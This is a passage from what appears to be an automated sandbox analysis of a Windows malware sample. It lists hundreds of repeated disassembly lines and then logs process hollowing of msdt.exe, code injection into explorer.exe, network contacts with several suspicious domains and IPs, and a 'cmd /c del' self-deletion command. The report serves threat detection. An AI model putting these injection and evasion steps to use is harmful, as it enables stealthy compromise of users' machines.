          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D705AC mov eax, dword ptr fs:[00000030h]18_2_04D705AC
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D705AC mov eax, dword ptr fs:[00000030h]18_2_04D705AC
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CE3D43 mov eax, dword ptr fs:[00000030h]18_2_04CE3D43
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D23540 mov eax, dword ptr fs:[00000030h]18_2_04D23540
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D53D40 mov eax, dword ptr fs:[00000030h]18_2_04D53D40
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CC7D50 mov eax, dword ptr fs:[00000030h]18_2_04CC7D50
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CCC577 mov eax, dword ptr fs:[00000030h]18_2_04CCC577
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CCC577 mov eax, dword ptr fs:[00000030h]18_2_04CCC577
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D78D34 mov eax, dword ptr fs:[00000030h]18_2_04D78D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D2A537 mov eax, dword ptr fs:[00000030h]18_2_04D2A537
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D6E539 mov eax, dword ptr fs:[00000030h]18_2_04D6E539
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CD4D3B mov eax, dword ptr fs:[00000030h]18_2_04CD4D3B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CD4D3B mov eax, dword ptr fs:[00000030h]18_2_04CD4D3B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CD4D3B mov eax, dword ptr fs:[00000030h]18_2_04CD4D3B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CAAD30 mov eax, dword ptr fs:[00000030h]18_2_04CAAD30
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CB3D34 mov eax, dword ptr fs:[00000030h]18_2_04CB3D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CB3D34 mov eax, dword ptr fs:[00000030h]18_2_04CB3D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CB3D34 mov eax, dword ptr fs:[00000030h]18_2_04CB3D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CB3D34 mov eax, dword ptr fs:[00000030h]18_2_04CB3D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CB3D34 mov eax, dword ptr fs:[00000030h]18_2_04CB3D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CB3D34 mov eax, dword ptr fs:[00000030h]18_2_04CB3D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CB3D34 mov eax, dword ptr fs:[00000030h]18_2_04CB3D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CB3D34 mov eax, dword ptr fs:[00000030h]18_2_04CB3D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CB3D34 mov eax, dword ptr fs:[00000030h]18_2_04CB3D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CB3D34 mov eax, dword ptr fs:[00000030h]18_2_04CB3D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CB3D34 mov eax, dword ptr fs:[00000030h]18_2_04CB3D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CB3D34 mov eax, dword ptr fs:[00000030h]18_2_04CB3D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CB3D34 mov eax, dword ptr fs:[00000030h]18_2_04CB3D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D78ED6 mov eax, dword ptr fs:[00000030h]18_2_04D78ED6
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CD36CC mov eax, dword ptr fs:[00000030h]18_2_04CD36CC
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CE8EC7 mov eax, dword ptr fs:[00000030h]18_2_04CE8EC7
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D5FEC0 mov eax, dword ptr fs:[00000030h]18_2_04D5FEC0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CB76E2 mov eax, dword ptr fs:[00000030h]18_2_04CB76E2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CD16E0 mov ecx, dword ptr fs:[00000030h]18_2_04CD16E0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D3FE87 mov eax, dword ptr fs:[00000030h]18_2_04D3FE87
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D70EA5 mov eax, dword ptr fs:[00000030h]18_2_04D70EA5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D70EA5 mov eax, dword ptr fs:[00000030h]18_2_04D70EA5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D70EA5 mov eax, dword ptr fs:[00000030h]18_2_04D70EA5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D246A7 mov eax, dword ptr fs:[00000030h]18_2_04D246A7
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CB7E41 mov eax, dword ptr fs:[00000030h]18_2_04CB7E41
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CB7E41 mov eax, dword ptr fs:[00000030h]18_2_04CB7E41
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CB7E41 mov eax, dword ptr fs:[00000030h]18_2_04CB7E41
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CB7E41 mov eax, dword ptr fs:[00000030h]18_2_04CB7E41
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CB7E41 mov eax, dword ptr fs:[00000030h]18_2_04CB7E41
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CB7E41 mov eax, dword ptr fs:[00000030h]18_2_04CB7E41
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D6AE44 mov eax, dword ptr fs:[00000030h]18_2_04D6AE44
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D6AE44 mov eax, dword ptr fs:[00000030h]18_2_04D6AE44
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CB766D mov eax, dword ptr fs:[00000030h]18_2_04CB766D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CCAE73 mov eax, dword ptr fs:[00000030h]18_2_04CCAE73
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CCAE73 mov eax, dword ptr fs:[00000030h]18_2_04CCAE73
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CCAE73 mov eax, dword ptr fs:[00000030h]18_2_04CCAE73
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CCAE73 mov eax, dword ptr fs:[00000030h]18_2_04CCAE73
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CCAE73 mov eax, dword ptr fs:[00000030h]18_2_04CCAE73
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CAC600 mov eax, dword ptr fs:[00000030h]18_2_04CAC600
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CAC600 mov eax, dword ptr fs:[00000030h]18_2_04CAC600
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CAC600 mov eax, dword ptr fs:[00000030h]18_2_04CAC600
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CD8E00 mov eax, dword ptr fs:[00000030h]18_2_04CD8E00
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CDA61C mov eax, dword ptr fs:[00000030h]18_2_04CDA61C
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CDA61C mov eax, dword ptr fs:[00000030h]18_2_04CDA61C
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D61608 mov eax, dword ptr fs:[00000030h]18_2_04D61608
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D5FE3F mov eax, dword ptr fs:[00000030h]18_2_04D5FE3F
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CAE620 mov eax, dword ptr fs:[00000030h]18_2_04CAE620
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CE37F5 mov eax, dword ptr fs:[00000030h]18_2_04CE37F5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D27794 mov eax, dword ptr fs:[00000030h]18_2_04D27794
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D27794 mov eax, dword ptr fs:[00000030h]18_2_04D27794
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D27794 mov eax, dword ptr fs:[00000030h]18_2_04D27794
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CB8794 mov eax, dword ptr fs:[00000030h]18_2_04CB8794
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CBEF40 mov eax, dword ptr fs:[00000030h]18_2_04CBEF40
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CBFF60 mov eax, dword ptr fs:[00000030h]18_2_04CBFF60
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D78F6A mov eax, dword ptr fs:[00000030h]18_2_04D78F6A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D3FF10 mov eax, dword ptr fs:[00000030h]18_2_04D3FF10
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D3FF10 mov eax, dword ptr fs:[00000030h]18_2_04D3FF10
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CDA70E mov eax, dword ptr fs:[00000030h]18_2_04CDA70E
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CDA70E mov eax, dword ptr fs:[00000030h]18_2_04CDA70E
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D7070D mov eax, dword ptr fs:[00000030h]18_2_04D7070D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D7070D mov eax, dword ptr fs:[00000030h]18_2_04D7070D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CCF716 mov eax, dword ptr fs:[00000030h]18_2_04CCF716
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CA4F2E mov eax, dword ptr fs:[00000030h]18_2_04CA4F2E
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CA4F2E mov eax, dword ptr fs:[00000030h]18_2_04CA4F2E
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CDE730 mov eax, dword ptr fs:[00000030h]18_2_04CDE730
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D3B8D0 mov eax, dword ptr fs:[00000030h]18_2_04D3B8D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D3B8D0 mov ecx, dword ptr fs:[00000030h]18_2_04D3B8D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D3B8D0 mov eax, dword ptr fs:[00000030h]18_2_04D3B8D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D3B8D0 mov eax, dword ptr fs:[00000030h]18_2_04D3B8D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D3B8D0 mov eax, dword ptr fs:[00000030h]18_2_04D3B8D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D3B8D0 mov eax, dword ptr fs:[00000030h]18_2_04D3B8D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CA58EC mov eax, dword ptr fs:[00000030h]18_2_04CA58EC
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CA40E1 mov eax, dword ptr fs:[00000030h]18_2_04CA40E1
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CA40E1 mov eax, dword ptr fs:[00000030h]18_2_04CA40E1
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CA40E1 mov eax, dword ptr fs:[00000030h]18_2_04CA40E1
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CA9080 mov eax, dword ptr fs:[00000030h]18_2_04CA9080
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D23884 mov eax, dword ptr fs:[00000030h]18_2_04D23884
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D23884 mov eax, dword ptr fs:[00000030h]18_2_04D23884
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CE90AF mov eax, dword ptr fs:[00000030h]18_2_04CE90AF
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CD20A0 mov eax, dword ptr fs:[00000030h]18_2_04CD20A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CD20A0 mov eax, dword ptr fs:[00000030h]18_2_04CD20A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CD20A0 mov eax, dword ptr fs:[00000030h]18_2_04CD20A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CD20A0 mov eax, dword ptr fs:[00000030h]18_2_04CD20A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CD20A0 mov eax, dword ptr fs:[00000030h]18_2_04CD20A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CD20A0 mov eax, dword ptr fs:[00000030h]18_2_04CD20A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CDF0BF mov ecx, dword ptr fs:[00000030h]18_2_04CDF0BF
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CDF0BF mov eax, dword ptr fs:[00000030h]18_2_04CDF0BF
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CDF0BF mov eax, dword ptr fs:[00000030h]18_2_04CDF0BF
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CC0050 mov eax, dword ptr fs:[00000030h]18_2_04CC0050
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CC0050 mov eax, dword ptr fs:[00000030h]18_2_04CC0050
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D71074 mov eax, dword ptr fs:[00000030h]18_2_04D71074
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D62073 mov eax, dword ptr fs:[00000030h]18_2_04D62073
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D74015 mov eax, dword ptr fs:[00000030h]18_2_04D74015
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D74015 mov eax, dword ptr fs:[00000030h]18_2_04D74015
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D27016 mov eax, dword ptr fs:[00000030h]18_2_04D27016
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D27016 mov eax, dword ptr fs:[00000030h]18_2_04D27016
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D27016 mov eax, dword ptr fs:[00000030h]18_2_04D27016
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CD002D mov eax, dword ptr fs:[00000030h]18_2_04CD002D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CD002D mov eax, dword ptr fs:[00000030h]18_2_04CD002D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CD002D mov eax, dword ptr fs:[00000030h]18_2_04CD002D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CD002D mov eax, dword ptr fs:[00000030h]18_2_04CD002D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CD002D mov eax, dword ptr fs:[00000030h]18_2_04CD002D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CBB02A mov eax, dword ptr fs:[00000030h]18_2_04CBB02A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CBB02A mov eax, dword ptr fs:[00000030h]18_2_04CBB02A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CBB02A mov eax, dword ptr fs:[00000030h]18_2_04CBB02A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CBB02A mov eax, dword ptr fs:[00000030h]18_2_04CBB02A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CCA830 mov eax, dword ptr fs:[00000030h]18_2_04CCA830
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CCA830 mov eax, dword ptr fs:[00000030h]18_2_04CCA830
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CCA830 mov eax, dword ptr fs:[00000030h]18_2_04CCA830
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CCA830 mov eax, dword ptr fs:[00000030h]18_2_04CCA830
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CAB1E1 mov eax, dword ptr fs:[00000030h]18_2_04CAB1E1
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CAB1E1 mov eax, dword ptr fs:[00000030h]18_2_04CAB1E1
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CAB1E1 mov eax, dword ptr fs:[00000030h]18_2_04CAB1E1
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D341E8 mov eax, dword ptr fs:[00000030h]18_2_04D341E8
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CDA185 mov eax, dword ptr fs:[00000030h]18_2_04CDA185
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CCC182 mov eax, dword ptr fs:[00000030h]18_2_04CCC182
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CD2990 mov eax, dword ptr fs:[00000030h]18_2_04CD2990
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D251BE mov eax, dword ptr fs:[00000030h]18_2_04D251BE
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D251BE mov eax, dword ptr fs:[00000030h]18_2_04D251BE
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D251BE mov eax, dword ptr fs:[00000030h]18_2_04D251BE
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D251BE mov eax, dword ptr fs:[00000030h]18_2_04D251BE
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CD61A0 mov eax, dword ptr fs:[00000030h]18_2_04CD61A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CD61A0 mov eax, dword ptr fs:[00000030h]18_2_04CD61A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D649A4 mov eax, dword ptr fs:[00000030h]18_2_04D649A4
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D649A4 mov eax, dword ptr fs:[00000030h]18_2_04D649A4
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D649A4 mov eax, dword ptr fs:[00000030h]18_2_04D649A4
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D649A4 mov eax, dword ptr fs:[00000030h]18_2_04D649A4
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D269A6 mov eax, dword ptr fs:[00000030h]18_2_04D269A6
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CCB944 mov eax, dword ptr fs:[00000030h]18_2_04CCB944
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CCB944 mov eax, dword ptr fs:[00000030h]18_2_04CCB944
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CAC962 mov eax, dword ptr fs:[00000030h]18_2_04CAC962
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CAB171 mov eax, dword ptr fs:[00000030h]18_2_04CAB171
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CAB171 mov eax, dword ptr fs:[00000030h]18_2_04CAB171
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CA9100 mov eax, dword ptr fs:[00000030h]18_2_04CA9100
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CA9100 mov eax, dword ptr fs:[00000030h]18_2_04CA9100
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CA9100 mov eax, dword ptr fs:[00000030h]18_2_04CA9100
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CC4120 mov eax, dword ptr fs:[00000030h]18_2_04CC4120
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CC4120 mov eax, dword ptr fs:[00000030h]18_2_04CC4120
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CC4120 mov eax, dword ptr fs:[00000030h]18_2_04CC4120
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CC4120 mov eax, dword ptr fs:[00000030h]18_2_04CC4120
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CC4120 mov ecx, dword ptr fs:[00000030h]18_2_04CC4120
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CD513A mov eax, dword ptr fs:[00000030h]18_2_04CD513A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CD513A mov eax, dword ptr fs:[00000030h]18_2_04CD513A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CD2ACB mov eax, dword ptr fs:[00000030h]18_2_04CD2ACB
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CD2AE4 mov eax, dword ptr fs:[00000030h]18_2_04CD2AE4
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CDD294 mov eax, dword ptr fs:[00000030h]18_2_04CDD294
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CDD294 mov eax, dword ptr fs:[00000030h]18_2_04CDD294
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CA52A5 mov eax, dword ptr fs:[00000030h]18_2_04CA52A5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CA52A5 mov eax, dword ptr fs:[00000030h]18_2_04CA52A5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CA52A5 mov eax, dword ptr fs:[00000030h]18_2_04CA52A5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CA52A5 mov eax, dword ptr fs:[00000030h]18_2_04CA52A5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CA52A5 mov eax, dword ptr fs:[00000030h]18_2_04CA52A5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CBAAB0 mov eax, dword ptr fs:[00000030h]18_2_04CBAAB0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CBAAB0 mov eax, dword ptr fs:[00000030h]18_2_04CBAAB0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CDFAB0 mov eax, dword ptr fs:[00000030h]18_2_04CDFAB0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D6EA55 mov eax, dword ptr fs:[00000030h]18_2_04D6EA55
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D34257 mov eax, dword ptr fs:[00000030h]18_2_04D34257
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CA9240 mov eax, dword ptr fs:[00000030h]18_2_04CA9240
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CA9240 mov eax, dword ptr fs:[00000030h]18_2_04CA9240
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CA9240 mov eax, dword ptr fs:[00000030h]18_2_04CA9240
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04CA9240 mov eax, dword ptr fs:[00000030h]18_2_04CA9240
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_00409B50 LdrLoadDll,1_2_00409B50
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.xn----pl8a630b0whm6t.com
          Source: C:\Windows\explorer.exeDomain query: www.epubgame.net
          Source: C:\Windows\explorer.exeNetwork Connect: 23.106.123.249 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 172.67.178.31 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.anamentor.com
          Source: C:\Windows\explorer.exeDomain query: www.fuslonnd.com
          Source: C:\Windows\explorer.exeDomain query: www.annellata.xyz
          Source: C:\Windows\explorer.exeDomain query: www.metricwombat.com
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeSection unmapped: C:\Windows\SysWOW64\msdt.exe base address: 9F0000Jump to behavior
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeSection loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeSection loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeSection loaded: unknown target: unknown protection: read writeJump to behavior
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeThread register set: target process: 3472Jump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeThread register set: target process: 3472Jump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeProcess created: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exe C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exe"Jump to behavior
          Source: explorer.exe, 00000004.00000000.254553864.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000004.00000000.280099499.0000000005EA0000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.265196730.00000000089FF000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.303201524.00000000089FF000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.274165242.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000004.00000000.294467030.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000004.00000000.284970506.00000000089FF000.00000004.00000001.sdmp, msdt.exe, 00000012.00000002.519708075.0000000003530000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000004.00000000.254553864.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000004.00000000.274165242.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000004.00000000.294467030.0000000001640000.00000002.00020000.sdmp, msdt.exe, 00000012.00000002.519708075.0000000003530000.00000002.00020000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000004.00000000.254553864.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000004.00000000.274165242.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000004.00000000.294467030.0000000001640000.00000002.00020000.sdmp, msdt.exe, 00000012.00000002.519708075.0000000003530000.00000002.00020000.sdmpBinary or memory string: SProgram Managerl
          Source: explorer.exe, 00000004.00000000.294037457.0000000001128000.00000004.00000020.sdmp, explorer.exe, 00000004.00000000.273892369.0000000001128000.00000004.00000020.sdmp, explorer.exe, 00000004.00000000.254192826.0000000001128000.00000004.00000020.sdmpBinary or memory string: ProgmanOMEa
          Source: explorer.exe, 00000004.00000000.254553864.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000004.00000000.274165242.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000004.00000000.294467030.0000000001640000.00000002.00020000.sdmp, msdt.exe, 00000012.00000002.519708075.0000000003530000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd,
          Source: explorer.exe, 00000004.00000000.254553864.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000004.00000000.274165242.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000004.00000000.294467030.0000000001640000.00000002.00020000.sdmp, msdt.exe, 00000012.00000002.519708075.0000000003530000.00000002.00020000.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeQueries volume information: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exe VolumeInformationJump to behavior
